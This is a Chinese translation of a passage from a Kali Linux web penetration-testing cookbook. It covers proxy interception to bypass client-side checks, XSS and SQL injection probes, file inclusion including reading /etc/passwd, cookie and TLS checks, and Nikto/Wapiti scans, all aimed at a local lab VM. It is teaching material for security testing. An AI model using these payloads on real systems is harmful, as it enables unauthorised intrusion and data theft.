 99 | OWASP ZAP 不仅仅是 Web 代码，它不仅仅能够拦截流量，也拥有许多在上一章所使用的，类似于爬虫的特性，还有漏洞扫描器，模糊测试器，爆破器，以及其它。它也拥有脚本引擎，可以用于自动化操作或者创建新的功能。
100 | 
101 | 这个秘籍中，我们会开始将 OWASP ZAP 用作代理，拦截请求，并在修改一些值之后将它发送给服务器。
102 | 
103 | ### 准备
104 | 
105 | 启动 ZAP 并配置浏览器在通过它发送信息。
106 | 
107 | ### 操作步骤
108 | 
109 | 1.  访问 <http://192.168.56.102/mutillidae/>。
110 | 
111 | 2.  现在，访问菜单栏中的`OWASP Top 10 | A1 – SQL Injection | SQLi – Extract Data | User Info`。
112 | 
113 | 3.  下一步是提升应用的安全等级。点击` Toggle Security`。现在`Security Level`应该是` 1 (Arrogant)`。
114 | 
115 | 4.  将`test'`（包含单引号）作为`Name`，以及` password'`作为`Password`，并且点击` View Account Details`。
116 | 
117 |     ![](img/4-3-1.jpg)
118 | 
119 |     我们得到了警告消息，告诉我们输入中的一些字符不合法。这里，单引号被检测到了，并被应用的安全手段中止。
120 |     
121 | 5.  点击`OK`来关闭警告。
122 | 
123 |     如果我们在 ZAP 中检查历史，我们可以看到没有发给服务器的请求，这是由于客户端校验机制。我们会使用请求拦截来绕过这个保护。
124 |     
125 | 6.  现在我们开启请求拦截（在 ZAP 叫做断点），通过点击`"break on all requests`（中断所有请求）按钮。
126 | 
127 |     ![](img/4-3-2.jpg)
128 |     
129 | 7.  下面，我们输入了有效值`Name`和`Password`，就像`test`和`password`，并再次检查细节。
130 | 
131 |     ZAP 会转移焦点，并打开叫做`Break`的新标签页。这里是刚刚在页面上产生的请求，我们可以看到一个 GET 请求，带有在 URL 中发送的`username`和`password`参数。我们可以添加上一次尝试中不允许的单引号。
132 |     
133 |     ![](img/4-3-3.jpg)
134 |     
135 | 8.  为了继续而不会被 ZAP 打断，我们通过点击`Unset Break`按钮来禁用断点。
136 | 
137 |     ![](img/4-3-4.jpg)
138 |     
139 | 9.  通过播放按钮来提交修改后的请求。
140 | 
141 |     ![](img/4-3-5.jpg)
142 |     
143 |     我们可以看到，应用在顶部提供给我们错误信息，所以这是它的保护机制，它在客户端检查用户输入，但是在服务端并没有准备好处理非预期的请求。
144 |     
145 | ### 工作原理
146 | 
147 | 这个秘籍中，我们使用 ZAP 代理来拦截有效的请求，将它修改为无效或而已请求，之后把它发给服务器并且触发非预期的行为。
148 | 
149 | 前三步用于开启安全保护，便于应用可以将单引号检测为无效字符。
150 | 
151 | 之后，我们产生测试请求，并证实了会执行一些校验。提示警告的时候，没有请求通过代理，这告诉了我们检验是在客户端进行的，可能使用 JavaScript。知道了这个之后，我们产生了合法的请求，并使用代理来拦截它，这让我们能够绕过客户端的保护。我们将该请求转换为恶意请求，并把它发给服务器，这使它不能被正确处理，并返回错误。
152 | 
153 | ## 4.4 使用  Burp Suite 查看和修改请求
154 | 
155 | Burp Suite 和 OWASP ZAP 一样，也不仅仅是个简单的 Web 代理。它是功能完整的 Web 应用测试包。它拥有代理、请求重放器、请求自动化工具、字符串编码器和解码器，漏洞扫描器（Pro 版本中），以及其它实用的功能。
156 | 
157 | 这个秘籍中，我们会执行上一个练习，但是这次使用 Burp Suite 的代理功能来拦截和修改请求。
158 | 
159 | ### 准备
160 | 
161 | 启动 Burp Suite 并让浏览器使用它的代理。
162 | 
163 | ### 操作步骤
164 | 
165 | 1.  浏览 <http://192.168.56.102/mutillidae/>。
166 | 
167 | 2.  默认情况下，Burp 代理中的拦截器是开着的，所以他会捕获第一个请求。我们需要打开  Burp Suite 并点击` Proxy `标签页中的`Intercept is on`按钮。
168 | 
169 |     ![](img/4-4-1.jpg)
170 |     
171 | 3.  浏览器会继续加载页面。当它完成时，我们通过` Toggle Security `将当前的应用安全级别设置为` 1 (Arrogant)`。
172 | 
173 | 4.  从菜单栏中访问` OWASP Top 10 | A1 – SQL Injection | SQLi – Extract Data | User Info`。
174 | 
175 | 5.  在`Name`输入框中，对`Username`输入`user<>`（包括符号）。在`Password`输入框中，对`Password`输入`secret<> `。之后点击`View Account Details`。
176 | 
177 |     我们会得到警告，告诉我们我们可能向应用输入了一些危险字
178 | 符。
179 | 
180 | 6.  现在我们直到这些符号在表单中并不允许，我们也知道了它是客户端的校验，因为代理的` HTTP history `标签页中没有任何请求出现。让我们尝试绕过这个保护。通过点击 Burp Suite 中的`Intercept is off`来开启消息拦截。
181 | 
182 |     ![](img/4-4-2.jpg)
183 |     
184 | 7.  下一步是发送有效数据，例如`user`和`secret`。
185 | 
186 | 8.  代理会拦截该请求。现在我们修改`username`和`password`的值，通过添加禁止的字符`<>`。
187 | 
188 |     ![](img/4-4-3.jpg)
189 |     
190 | 9.  我们可以发送编辑后的信息，并通过点击` Intercept is on`来禁用拦截，或者我们可能发酸发送他并保持消息拦截，通过点击`Forward`。对于这个练习，我们禁用拦截并检查结果。
191 | 
192 |     ![](img/4-4-4.jpg)
193 | 
194 | ### 工作原理
195 | 
196 | 就像在上个秘籍中看到的那样，在请求经过由应用建立在客户端的验证机制之前，我们使用代理来捕获请求，并通过添加一些在检验中不允许的字符，修改了它的内容。
197 | 
198 | 能够拦截和修改请求，对任何 Web 应用渗透测试来说都非常重要，不仅仅用于绕过一些客户端检验，就像我们在当前和上一个秘籍中所做的那样，也能够用于了解发送了哪个信息，以及尝试理解应用的内部原理。我们可能也需要基于我们的理解来添加、移除或替换一些值。
199 | 
200 | ## 4.5 识别跨站脚本（XSS）漏洞
201 | 
202 | 跨站脚本（XSS）是 Web 应用中最常见的漏洞之一。实际上，它位于 2013 年 OWASP Top 10 的第三名（<https://www.owasp.org/ index.php/Top_10_2013-Top_10>）。
203 | 
204 | 这个秘籍中，我们会看到一些识别 Web 应用中跨站脚本漏洞的关键点。
205 | 
206 | ### 操作步骤
207 | 
208 | 1.  登录 DVWA 并访问反射型 XSS。
209 | 
210 | 2.  测试漏洞的第一步是观察应用的正常响应。在文本框中输入名称并点击`Submit`按钮。我们使用`Bob`。
211 | 
212 |     ![](img/4-5-1.jpg)
213 |     
214 | 3.  应用会使用我们提供的名称来拼接代码。如果我们不输入有效名称，而是输入一些特殊字符或数字会怎么样呢？让我们尝试`<'this is the 1st test'>`。
215 | 
216 |     ![](img/4-5-2.jpg)
217 |     
218 | 4.  现在我们可以看到，我们输入在文本框汇总的任何东西都会反射到响应中，也就是说，它成为了响应中 HTML 页面的一部分。让我们检查页面源代码来分析它如何展示信息，就像下面截图中那样：
219 | 
220 |     ![](img/4-5-3.jpg)
221 | 
222 |     源码表明了输出中没有对任何特殊字符做编码。我们发送的特殊字符被反射回了页面，没有任何预处理。`<`和`>`符号适用于定义 HTML 标签的符号，我们可能能够在这里输入一些脚本代码。
223 |     
224 | 5.  尝试输入一个名称，后面带有非常简单的脚本代码。
225 | 
226 |     ```
227 |     Bob<script>alert('XSS')</script>
228 |     ```
229 |     
230 |     ![](img/4-5-4.jpg)
231 |     
232 |     页面会执行脚本，并弹出提示框，表明这个页面上存在跨站脚本漏洞。
233 |     
234 | 6.  现在检查源码来观察输入中发生了什么。
235 | 
236 |     ![](img/4-5-5.jpg)
237 |     
238 |     我们的输入看起来作为 HTML 的一部分来处理。浏览器解释了`<script>`标签并执行了其中的代码，弹出了我们设置的提示框。
239 |     
240 | ### 工作原理
241 | 
242 | 跨站脚本漏洞在服务端和客户端中没有输入校验，并且输出没有合理编码时发生。这意味着应用允许我们输入用于 HTML 代码中的字符。一旦它被决定发送到页面中，并没有执行任何编码措施（例如使用 HTML 转义代码`&lt` 和 `&gt;`）来防止他们被解释为源代码。
243 | 
244 | 这些漏洞可被攻击者利用来改变客户端的页面行为，并欺骗用户来执行它们不知道的操作，或偷取隐私信息。
245 | 
246 | 为了发现 XSS 漏洞，我们需要遵循以下原则：
247 | 
248 | +   我们在输入框中输入的，准确来说是被发送的文本，用于形成在页面中展示的信息，这是反射型漏洞。
249 | 
250 | +   特殊的字符没有编码或转义。
251 | 
252 | +   源代码表明，我们的输入被集成到某个位置，其中它变成了 HTML 代码的一部分，并且会被浏览器解释。
253 | 
254 | ### 更多
255 | 
256 | 这个秘籍中，我们发现了反射型 XSS，也就是说这个脚本在每次我们发送请求时，并且服务器响应我们的恶意请求时都会执行。有另外一种 XSS 类型叫做“存储型”。存储型 XSS 可能会在输入提交之后立即展示，也可能不会。但是这种输入会储存在服务器（也可能是数据库）中，它会在用户每次访问储存数据时执行。
257 | 
258 | ## 4.6 基于错误的 SQL 注入识别
259 | 
260 | 注入在 OWASP top 10 列表中位列第一。这包含，我们会在这个秘籍中测试的漏洞：SQL 注入（SQLI），以及其它。
261 | 
262 | 多数现代 Web 应用实现了某种类型的数据库，要么本地要么远程。SQL 是最流行的语言，在 SQLI 攻击中，攻击者向表单输入或请求中的其它参数注入 SQL 命令，使应用发送修改后的请求，来试图不正当使用应用和数据库通信。其中请求用于构建服务器中的 SQL 语句。
263 | 
264 | 这个秘籍中，我们会测试 Web 应用的输入，来观察是否含有 SQL注入漏洞。
265 | 
266 | ### 操作步骤
267 | 
268 | 登录 DWVA 并执行下列步骤：
269 | 
270 | 1.  访问` SQL Injection`。
271 | 
272 | 2.  类似于上一章，我们通过输入数字来测试应用的正常行为。将`User ID`设置为1，并点击`Submit`。
273 | 
274 |     我们可以通过解释结果来得出，应用首先查询数据库，是否有 ID 等于 1 的用户，之后返回结果。
275 |     
276 | 3.  下面，我们必须测试，如果我们发送一些应用的非预期结果，会发生什么。在输入框中输入`1'`并提交该 ID。
277 | 
278 |     ![](img/4-6-1.jpg)
279 | 
280 |     这个错误信息告诉我们，我们修改了生成好的查询。这并不意味着这里确实有 SQL 注入，但是我们可以更进一步。
281 | 
282 | 4.  返回 DWVA/SQL 注入页面。
283 | 
284 | 5.  为了验证是否有基于错误的 SQL 输入，我们尝试另一个输入：`1''`（两个单引号）。
285 | 
286 |     ![](img/4-6-2.jpg)
287 | 
288 | 
289 | 6.  现在，我们要执行基本的 SQL 注入攻击，在输入框中输入`' or '1'='1`并提交。
290 | 
291 |     ![](img/4-6-3.jpg)
292 |     
293 |     看起来我们获取了所有数据库中的注册用户。
294 | 
295 | ### 工作原理
296 | 
297 | SQL 注入发生在输入在用于组成数据库查询之前没有校验的时候。让我们假设服务端的代码（PHP）拼装了一个请求，例如：
298 | 
299 | ```php
300 | $query = "SELECT * FROM users WHERE id='".$_GET['id']. "'";
301 | ```
302 | 
303 | 这意味着，`id`参数中发送的数据会被集成进来，因为它在查询里面。将参数的引用替换为它的值，我们能得到：
304 | 
305 | ```php
306 | $query = "SELECT * FROM users WHERE id='"."1". "'";
307 | ```
308 | 
309 | 所以，当我们发送恶意输入，就像之前那样，代码行会由 PHP 解释器读取，就像：
310 | 
311 | ```php
312 | $query = "SELECT * FROM users WHERE id='"."' or '1'='1"."'";
313 | ```
314 | 
315 | 拼接为：
316 | 
317 | ```php
318 | $query = "SELECT * FROM users WHERE id='' or '1'='1'";
319 | ```
320 | 
321 | 这意味着“选择`users`表中的任何条目，只要用户`id`等于空或者 1 等于 1”。然而 1 永远等于 1，这就意味着所有用户都复合条件。我们发送的第一个引号闭合了原始代码中的做引号，之后我们输入了一些 SQL 代码，不带有闭合的单引号，而是使用已经在服务端代码中该设置好的单引号。
322 | 
323 | ### 更多
324 | 
325 | SQL 攻击比起显式应用的用户名，可能导致更严重的破坏。通过利用这些漏洞，攻击者可能会通过执行命令和提权来控制整个服务器。它也能够提取数据库中的所有信息，包括系统用户名称和密码。取决于服务器和内部网络的配置，SQL 注入漏洞可能是整个网络和内部设施入侵的入口。
326 | 
327 | ## 4.7 识别 SQL 盲注
328 | 
329 | 我们已经看到了 SQL 注入漏洞如何工作。这个秘籍中，我们会涉及到相同类型漏洞的不同变体，它不显式任何能够引导我们利用的错误信息或提示。我们会学习如何识别 SQL 盲注。
330 | 
331 | ### 操作步骤
332 | 
333 | 1.  登录 DVWA 并访问`SQL Injection (Blind)`。
334 | 
335 | 2.  它看起来像是我们上一章了解的 SQL 注入。在输入框中输入`1`并点击`Submit`。
336 | 
337 | 3.  现在我们首次测试`1'`。
338 | 
339 |     ![](img/4-7-1.jpg)
340 |     
341 |     我们没有得到任何错误信息，但是也没有结果，这里可能会发生一些有趣的事情。
342 |     
343 | 4.  我们第二次测试`1''`。
344 | 
345 |     ![](img/4-7-2.jpg)
346 |     
347 |     `ID=1`的结果显示了，这意味着上一个结果`1'`产生了错误，并被应用捕获和处理掉了。很可能这里有个 SQL 注入漏洞，但是它是盲注，没有显示关于数据库的信息，所以我们需要猜测。
348 |     
349 | 5.  让我们尝试识别，当用户注入永远为假的代码会发生什么。将` 1' and '1'='2 `设置为用户的 ID。
350 |     
351 |     `'1'`永远不会等于`'2'`，所以没有任何记录符合查询中的条件，并且没有人恶化结果。
352 | 
353 | 6.  现在，尝试当 ID 存在时永远为真的请求：` 1' and '1'='1`。
354 | 
355 |     ![](img/4-7-3.jpg)
356 |     
357 |     这演示了页面上的盲注。如果我们的永远为假的 SQL 注入得到了不同的响应，并且永远为真的结果得到了另一个响应，这里就存在漏洞，因为服务器会执行代码，即使它不显示在响应中。
358 |     
359 | ### 工作原理
360 | 
361 | 基于错误的 SQL 输入和盲注都存在于服务端，也就是漏洞的那一段。应用在使用输入生成数据库查询之前并不过滤输入。二者的不同存在于检测和利用上。
362 | 
363 | 在基于错误的 SQL 注入中，我们使用由服务器发送的错误来识别查询类型，表和列的名称。
364 | 
365 | 另一方面，当我们视图利用盲注时，我们需要通过问问题来得到信息。例如，` "' and name like 'a%"`的意思是，“是否存在以`'a'`开头的用户？”如果我们得到了负面响应，我们会询问是否有以`'b'`开头的名称。在得到正面结果之后，我们会就会移动到第二个字符：`"' and name like 'ba%"`。所以我们会花费很多时间来检测和利用。
366 | 
367 | ### 另见
368 | 
369 | 下面的信息可能有助于更好的了解 SQL 盲注：
370 | 
371 | +   https://www.owasp.org/index.php/Blind_SQL_Injection 
372 | +   https://www.exploit-db.com/papers/13696/ 
373 | +   https://www.sans.org/reading-room/whitepapers/securecode/sqlinjection-modes-attack-defence-matters-23
374 | 
375 | ## 4.8 识别 Cookie 中的漏洞
376 | 
377 | Cookie 是从网站发送的小型数据片段，它储存于用户的浏览器中。它们包含有关于这种浏览器或一些特定 Web 应用用户的信息。在现代 Web 应用汇总，Cookie 用于跟踪用户的会话。通过在服务端和客户端保存 Session ID，服务器能够同时识别由不同客户端产生的不同请求。当任何请求发送到服务器的时候，浏览器添加 Cookie并之后发送请求，服务器可以基于这个 COokie 来识别会话。
378 | 
379 | 这个秘籍中，我们会学到如何识别一些漏洞，它们允许攻击者劫持有效用户的会话。
380 | 
381 | ### 操作步骤
382 | 
383 | 1.  访问 <http://192.168.56.102/mutillidae/>。
384 | 
385 | 2.  打开 Cookie Manager+ 并且删除所有 Cookie。这可以防止与之前的 Cookie 产生混乱。
386 | 
387 | 3.  现在，在 Mutillidae II中，访问`OWASP Top 10 | A3 – Broken Authentication and Session Management | Cookies`。
388 | 
389 | 4.  在`Cookies Manager+ `中，我们会看到出现了两个新的 Cookie。`PHPSESSID `和`showhints`。选项前者并点击`Edit`来查看所有参数。
390 | 
391 |     ![](img/4-8-1.jpg)
392 |     
393 |     `PHPSESSID `是基于 PHP 的 Web 应用的会话默认名称。通过查看 Cookie 中参数值，我们可以看到它可以经过安全和不安全的频道（HTTP 和 HTTPS）发送。同样，它可以被服务器读取，以及被客户端用过脚本代码读取，因为它并没有开启 HTTPOnly 标识。这就是说，这个应用的会话可以被劫持。
394 |     
395 | ### 工作原理
396 | 
397 | 这个秘籍中，我们检查了 Cookie 的某些之，虽然并不像上一个那么明显。在每次渗透测试中检查 Cookie 的配置非常重要，不正确的会话 Cookie 设置会打开会话劫持攻击的大门，以及错误使用受信任的用户账户。
398 | 
399 | 如果 Cookie 没开启`HTTPOnly`标识，他就可以被脚本读取。因此，如果存在跨站脚本攻击漏洞，攻击者就能够得到有效会话的 ID，并且使用它来模拟应用中的真实用户。
400 | 
401 | Cookies Manager+ 中的安全属性，或者`Send For Encrypted Connections Only`选项告诉浏览器只通过加密的频道发送或接受该 Cookie（也就是说，只通过 HTTPS）。如果这个标志没有设置，攻击者可以执行中间人攻击（MITM），并且通过 HTTP 来得到会话 Cookie，这会使它显示为纯文本，因为 HTTP 是个纯文本的协议。这就再次产生了攻击者能够通过持有会话 ID 来模拟有效用户的场景。
402 | 
403 | ### 更多
404 | 
405 | 就像`PHPSESSID `是 PHP 会话 Cookie 的默认名称那样，其它平台也拥有名称，例如：
406 | 
407 | +   `ASP.NET_SessionId `是 ASP.NET 会话 Cookie 的名称。
408 | 
409 | +   `JSESSIONID`是 JSP 实现的会话 Cookie。
410 | 
411 | OWASP 有一篇非常透彻的文章，关于保护会话 ID 和会话 Cookie。
412 | 
413 | https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
414 | 
415 | ## 4.9 使用 SSLScan 获取 SSL 和 TLS 信息
416 | 
417 | 我们在某种程度上，假设当一个连接使用带有 SSL 或 TLS 加密的 HTTPS 时，它是安全的，而且任何试图拦截它的攻击者都只会得到一些无意义的数字。但是，这并不绝对正确：HTTPS 服务器需要正确配置来提供有效的加密层，并保护用户不受 MITM 攻击或密码分析。一些 SSL 协议的实现和设计上的漏洞已经被发现了，所以，我们在任何 Web 应用渗透测试中都要测试安全连接的强制性。
418 | 
419 | 这个秘籍中，我们会使用 SSLScan，它是 Kali Linux 所包含的工具，基于服务器的安全通信来分析服务器的配置文件（从客户端的角度）。
420 | 
421 | ### 操作步骤
422 | 
423 | OWASP BWA 虚拟机已经配置好了 HTTPS 服务器，为了确保它正常工作，访问 <https://192.168.56.102/>，如果页面没有正常加载，你可能需要在继续之前检查你的配置文件。
424 | 
425 | 2.  SSLScan 是个命令行工具（内建于 Kali），所以我们需要打开终端。
426 | 
427 | 3.  基本的`sslscan`命令会提供给我们服务器的足够信息。
428 | 
429 |     ```
430 |     sslscan 192.168.56.102
431 |     ```
432 |     
433 |     ![](img/4-9-1.jpg)
434 |     
435 |     输出的第一部分告诉我们服务器的配置，包含常见的安全错误配置：重协商、压缩和 Heartbleed，它是最近在一些 TLS 实现中发现的漏洞。这里，一切看起来都很好。
436 |     
437 |     ![](img/4-9-2.jpg)
438 |     
439 |     在第二部分中，SSLScan 会展示服务器接受的加密方式。正如我们看到的那样，它支持 SSLv3 和一些例如 DES 的方式，它现在是不安全的。它们以红色文字展示，黄色文字代表中等强度的加密。
440 |     
441 |     ![](img/4-9-3.jpg)
442 |     
443 |     最后，我们看到了首选的加密方式，如果客户端支持它，服务器会尝试用于通信。最终，服务器会使用有关证书的信息。我们可以看到，它将中等强度的算法用于签名，并使用 RSA 弱密钥。密钥是弱的，因为他只有 1024 位的长度，安全标准推荐至少 2048 位。
444 |     
445 | ### 工作原理
446 | 
447 | SSLScan 通过创建多个到 HTTPS 的链接来工作，并尝试不同的加密方式和客户端配置来测试它接受什么。
448 | 
449 | 当浏览器链接到使用 HTTPS 的服务器时，它们交换有关浏览器可以使用什么以及服务器支持什么的信息。之后它们在使用高度复杂的算法上达成一致。如果配置不当的 HTTPS 服务器上出现了 MITM 攻击，攻击者就可以通过声称客户端值支持弱加密算法来欺骗服务器，假如是 SSLv2 上的 56 位 DES。之后攻击者会拦截使用该算法加密的通信，通信可能会在几天或几小时之内使用现代计算机破解。
450 | 
451 | ### 更多
452 | 
453 | 就像我们之前提到的那样，SSLScan 能够检测 Heartbleed，这是一个最近在 OpenSSL 实现中发现的有趣漏洞。 
454 | 
455 | Heartbleed 在 2014 年四月被发现。它由一个缓冲区导致，多于允许的数据可以从内存中读出，这是 OpenSSL TLS 中的情况。
456 | 
457 | 实际上，Heartbleed 可以在任何未装补丁的支持 TLS 的 OpenSSL （1.0.1 到 1.0.1f 之间）服务器上利用。它从服务器内存中读取 64 KB 的纯文本数据，这能够重复执行，服务器上不会留下任何踪迹或日志。这意味着攻击者可以从服务器读取纯文本信息，包括服务器的的私钥或者加密正是，会话 Cookie 或 HTTPS 请求会包含用户的密码或其它敏感信息。更多 Heartbleed 的信息请见维基百科：<https://en.wikipedia.org/wiki/ Heartbleed>。
458 | 
459 | ### 另见
460 | 
461 | SSLScan 并不是唯一从 SSL/TLS 获取加密信息的攻击。Kali 中也有另一个工具叫做 SSLyze 可以用作替代，并且有时候会提供额外信息给攻击者。
462 | 
463 | ```
464 | sslyze --regular www.example.com 
465 | ```
466 | 
467 | SSL/TLS 信息也可以通过 OpenSSL 命令获得：
468 | 
469 | ```
470 | openssl s_client -connect www2.example.com:443
471 | ```
472 | 
473 | ## 4.10 查找文件包含
474 | 
475 | 文件包含漏洞出现在开发者使用请求参数的时候，在服务端的代码中，参数可以被用户修改来动态选择加载或包含哪个页面。如果服务器执行了所包含的文件，这种漏洞可能导致整个系统的沦陷。
476 | 
477 | 这个秘籍中，我们会测试 Web 应用来发现是否含有文件包含漏洞。
478 | 
479 | ### 操作步骤
480 | 
481 | 1.  登录 DVWA 并访问`File Inclusion`。
482 | 
483 | 2.  我们需要编辑 GET 参数来测试包含。让我们尝试`index.php`。
484 | 
485 |     ![](img/4-10-1.jpg)
486 | 
487 |     看起来目录中没有`index.php`文件（或者它为空），也可能这意味着本地文件包含（LFI）可能出现。
488 |     
489 | 3.  为了尝试 LFI，我们需要了解本地真正存在的文件名称。我们知道了 DVWA 根目录下存在`index.php`，所以我们对文件包含尝试目录遍历，将页面遍历设置为`../../index.php`。
490 | 
491 |     ![](img/4-10-2.jpg)
492 |     
493 |     这样我们就演示了 LFI 可能出现，并且路径遍历也可能出现（使用`../../`，我们就遍历了目录树）。
494 |     
495 | 4.  下一步是尝试远程文件包含，包括储存在另一个服务器的我呢间，而不是本地文件，由于我们的测试虚拟机并没有连接互联网（或者它不应该联网，出于安全因素）。我们尝试带有完整 URL 的本地文件，就像它来自另一个服务器那样。我们也会尝试包含 Vicnum 的主页`?page=http://192.168.56.102/vicnum/index.html`，通过提供页面的 URL 作为参数，就像下面这样：
496 | 
497 |     ![](img/4-10-3.jpg)
498 |     
499 |     我们能够通过提供完整 URL 使应用加载页面，这意味着我们可以包含远程文件，因此，存在远程文件包含（RFI）。如果被包含文件含有服务端可执行代码（例如 PHP），这种代码会被服务端执行。因此，攻击者可以执行远程命令，这样的话，整个系统很可能沦陷。
500 |     
501 | ### 工作原理
502 | 
503 | 如果我们使用 DVWA 的`View Source`按钮，我们可以看到服务端代码是：
504 | 
505 | ```php
506 | <?php 
507 | $file = $_GET['page']; //The page we wish to display 
508 | ?>
509 | ```
510 | 
511 | 这意味着`page`变量的值直接传给了文件名称，之后它被包含在代码中。这样，我们可以在服务端包含和执行任何我们想要的 PHP 或 HTML 文件，只要它可以通过互联网访问。存在 RFI 漏洞的情况下，服务器一定会在配置文件中打开`allow_url_fopen`和`allow_url_include`。否则它只能含有本地文件包含，如果文件包含漏洞存在的话。
512 | 
513 | ### 更多
514 | 
515 | 我们也可以使用本地文件包含来显示主机操作系统的相关文件。例如，试着包含`../../../../../../etc/passwd `，之后你就会得到系统用户和它们的主目录，以及默认 shell 的列表。
516 | 
517 | ## 4.11 识别 POODLE 漏洞
518 | 
519 | 就像上一章提到的那样，使用 SSLScan 获得 HTTPS 参数在一些条件下是可能的，尤其是中间人攻击者降级用于加密通信的安全协议和加密算法的时候。
520 | 
521 | POODLE 攻击使用这种条件来将 TLS 通信降级为 SSLv3 并强制使用易于被攻破的加密算法（CBC）。
522 | 
523 | 这个秘籍中，我们会使用 Nmap 脚本来检测这种漏洞在测试服务器上是否存在。
524 | 
525 | ### 准备
526 | 
527 | 我们需要安装 Nmap 并下载特定为检测此漏洞而编写的脚本。
528 | 
529 | 1.  访问` http://nmap.org/nsedoc/scripts/ssl-poodle.html`。
530 | 
531 | 2.  下载` ssl-poodle.nse`文件。
532 | 
533 | 3.  假设它下载到了你的 Kali 中的`/root/Downloads`中。下载打开终端并将它复制到 Nmap 的脚本目录中：
534 | 
535 |     ```
536 |     cp /root/Downloads/ssl-poodle.nse /usr/share/nmap/scripts/
537 |     ```
538 |     
539 | ### 操作步骤
540 | 
541 | 一旦你安装了脚本，执行下列步骤：
542 | 
543 | 1.  打开终端并运行：
544 | 
545 |     ```
546 |     nmap --script ssl-poodle -sV -p 443 192.168.56.102
547 |     ```
548 |     
549 |     ![](img/4-11-1.jpg)
550 | 
551 |     
552 |     我们告诉了 Nmap 要扫描`192.168.56.102`（我们的 vulnerable_vm）的 443 端口，识别服务版本并在它上面执行 ssl-poodle 脚本。一次你，我们可以断定，服务器有漏洞，因为它允许 使用` TLS_RSA_WITH_ AES_128_CBC_SHA`加密算法的 SSLv3 。
553 |     
554 | ### 工作原理
555 | 
556 | 我们下载的 Nmap 脚本和测试服务器建立了安全通信，并判断他是否支持 SSLv3 上的 CBC 加密算法。如果支持，它就存在漏洞。漏洞会导致任何拦截的信息都能被攻击者在很短的时间内解密。
557 | 
558 | ### 另见
559 | 
560 | 为了更好理解这个攻击，你可以查看一些这个加密实现最基本的解释。
561 | 
562 | +   Möller, Duong, and Kotowicz, This POODLE Bites: Exploiting the SSL 3.0 Fallback, https://www.openssl.org/~bodo/ssl-poodle.pdf 
563 | +   https://en.wikipedia.org/wiki/Padding_oracle_attack 
564 | +   https://en.wikipedia.org/wiki/Padding_%28cryptography%29#Block_cipher_mode_of_operation
565 | 


--------------------------------------------------------------------------------
/ch5.md:
--------------------------------------------------------------------------------
  1 | # 第五章 自动化扫描
  2 | 
  3 | > 作者：Gilberto Najera-Gutierrez
  4 | 
  5 | > 译者：[飞龙](https://github.com/)
  6 | 
  7 | > 协议：[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/)
  8 | 
  9 | ## 简介
 10 | 
 11 | 几乎每个渗透测试项目都需要遵循严格的日程，多数由客户的需求或开发交谈日期决定。对于渗透测试者，拥有一种工具，它可以在很短的时间内执行单个应用上的多个测试，来尽可能在排期内识别最多漏洞很有帮助。自动化漏洞扫描器就是完成这种任务的工具，它们也用于发现替代的利用，或者确保渗透测试中不会遗漏了明显的事情。
 12 | 
 13 | Kali 包含一些针对 Web 应用或特定 Web 漏洞的漏洞扫描器。这一章中，我们会涉及到一些在渗透测试者和安全研究员中最广泛使用工具。
 14 | 
 15 | ## 5.1 使用 Nikto 扫描
 16 | 
 17 | 每个测试者的工具库中必定含有的工具就是 Nikto，它可能是世界上使用最广泛的自由扫描器。就像它的网站（<https://cirt.net/Nikto2>）上所说的那样：
 18 | 
 19 | > Nikto 是开源（GPL）的 Web 服务器扫描器，它对 Web 服务器执行综合扫描，包含超过 6700 个潜在的危险文件或程序，检查超过 1250 个服务器的过期版本，以及超过 270 个服务器上的特定问题。它也会检查服务器配置项，例如多个首页文件的存在，HTTP 服务器选项，也会尝试识别安装的 Web 服务器和软件。扫描的项目和插件也会经常更新，并可以自动更新。
 20 | 
 21 | 这个秘籍中，我们会使用 Nikto 来搜索 Web 服务器中的漏洞并分析结果、
 22 | 
 23 | ### 操作步骤
 24 | 
 25 | 1.  Nikto 是个命令行工具，所以我们打开终端。
 26 | 
 27 | 2.  我们会扫描 Peruggia 漏洞应用，并导出结果到 HTML 报告：
 28 | 
 29 |     ```
 30 |     nikto -h http://192.168.56.102/peruggia/ -o result.html
 31 |     ```
 32 |     
 33 |     ![](img/5-1-1.jpg)
 34 |     
 35 |     `-h`选项告诉 Nikto 扫描哪个主机，`-o`选项告诉在哪里存放输出，文件的扩展名决定了接受的格式。这里，我们使用`.html`来获得 HTML 格式的结果报告。输出也可以以 CSV、TXT 或 XML 格式。
 36 |     
 37 | 3.  它需要一些时间来完成扫描。完成之后，我么可以打开`result.html`文件：
 38 | 
 39 |     ![](img/5-1-2.jpg)
 40 |     
 41 | ### 工作原理
 42 | 
 43 | 这个秘籍中，我们使用 Nikto 来扫描应用并生成 HTML 报告。这个工具拥有一些更多的选项，用于执行特定扫描或生成特定输出格式。一些最实用的选项是：
 44 | 
 45 | +   `-H`：这会显示 Nikto 的帮助。
 46 | 
 47 | +   `-config <file>`：在扫描中用自定义的配置文件。
 48 | 
 49 | +   `-update`：更新插件数据库。
 50 | 
 51 | +   `-Format <format>`：这定义了输出格式，可以为CSV、HTML、NBE（Nessus）、SQL、TXT 或 XML。例如 CSV、XML 和 NBE 的格式在我们打算将其用于其它工具的输入时非常实用。
 52 | 
 53 | +   `-evasion <techique>`：这使用一些编码技巧来帮助避免 Web 应用防火墙和入侵检测系统的检测。
 54 | 
 55 | +   `-list-plugins`：查看可用的测试插件。
 56 | 
 57 | +   `-Plugins <plugins>`：选择在扫描中使用哪个插件（默认为全部）。
 58 | 
 59 | +   `-port <port number>`：如果服务器使用非标准端口（80，443），我们可能会以这个选项来使用 Nikto。
 60 | 
 61 | ## 5.2 使用 Wapiti 发现漏洞
 62 | 
 63 | Wapiti 是另一个基于终端的 Web 漏洞扫描器，它发送 GET 和 POST 请求给目标站点，来寻找下列漏洞（<http://wapiti. sourceforge.net/>）：
 64 | 
 65 | +   文件泄露
 66 | 
 67 | +   数据库注入
 68 | 
 69 | +   XSS
 70 | 
 71 | +   命令执行检测
 72 | 
 73 | +   CRLF 注入
 74 | 
 75 | +   XXE（XML 外部实体）注入
 76 | 
 77 | +   已知潜在危险文件的使用
 78 | 
 79 | +   可被绕过的`.htaccess `弱配置
 80 | 
 81 | +   提供敏感信息的备份文件（源码泄露）
 82 | 
 83 | 这个秘籍中，我们使用 Wapiti 来发现我们的测试应用上的漏洞，并生成扫描报告。
 84 | 
 85 | ### 操作步骤
 86 | 
 87 | 1.  我们可以从终端窗口打开 Wapiti，例如：
 88 | 
 89 |     ```
 90 |     wapiti http://192.168.56.102/peruggia/ -o wapiti_result -f html -m "-blindsql"
 91 |     ```
 92 |     
